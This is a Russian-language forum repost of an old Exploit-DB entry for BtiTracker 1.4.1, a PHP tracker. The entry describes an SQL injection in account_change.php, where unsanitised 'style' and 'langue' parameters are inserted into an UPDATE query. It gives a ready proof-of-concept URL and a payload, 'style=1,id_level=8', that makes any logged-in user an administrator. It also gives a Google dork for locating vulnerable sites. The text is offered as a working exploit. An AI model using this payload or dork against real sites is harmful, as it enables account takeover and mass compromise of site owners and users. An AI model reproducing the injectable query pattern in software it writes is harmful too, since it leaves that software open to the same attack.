Exploit BtiTracker 1.4.1 - Become Admin SQL Injection

Exploiter

Хакер
34,644
0
18 Дек 2022
EDB-ID
3970
Проверка EDB
  1. Пройдено
Автор
M@GE|OZZ
Тип уязвимости
WEBAPPS
Платформа
PHP
CVE
cve-2007-2854
Дата публикации
2007-05-22
Код:
#################################################################################
#										
#	BtiTracker <=v1.4.1 Remote SQL Injection Exploit	              
#									
# Discovered by: m@ge|ozz - [email protected]					
# Vulnerabitity: Remote Sql Injection /	                                        
# Problem: Any user can be Administrator					
# Website Vendor: http://www.btiteam.org					
# 										
# Vulnerable Code (account_change.php):						
#										
# if (isset($_GET["style"]))       						
# @mysql_query("UPDATE users SET style=$style WHERE id=".$CURUSER["uid"]);      
# 										
# if (isset($_GET["langue"])) 							
# @mysql_query("UPDATE users SET language=$langue WHERE id=".$CURUSER["uid"]);		
#										
# PoC: account_change.php?style=2[SQL]&returnto=%2F				
#      										
# Example to gain admin control: account_change.php?style=1,id_level=8								
#										
# 										
# GoogleDork: "by Btiteam"							
#										
# Shoutz: - eVolVe or Die - 							
#										
#################################################################################

# milw0rm.com [2007-05-22]
 
Источник
www.exploit-db.com

Похожие темы